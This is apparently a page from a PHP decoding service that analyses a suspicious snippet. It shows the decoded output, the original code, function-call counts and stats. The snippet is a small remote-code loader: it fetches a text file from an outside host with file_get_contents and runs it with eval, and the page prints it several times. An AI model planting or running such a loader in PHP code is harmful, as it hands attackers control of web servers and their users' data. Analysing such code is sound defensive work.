Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $b=file_get_contents("http://sb.f4ck.org/1.txt"); eval($b); ?>..
Decoded Output download
<?php
$b=file_get_contents("http://sb.f4ck.org/1.txt");
eval($b);
?>
Did this file decode correctly?
Original Code
<?php
$b=file_get_contents("http://sb.f4ck.org/1.txt");
eval($b);
?>
Function Calls
| file_get_contents | 1 |
Stats
| MD5 | 0b31bfb4735733b9360b996571e0b937 |
| Eval Count | 1 |
| Decode Time | 116 ms |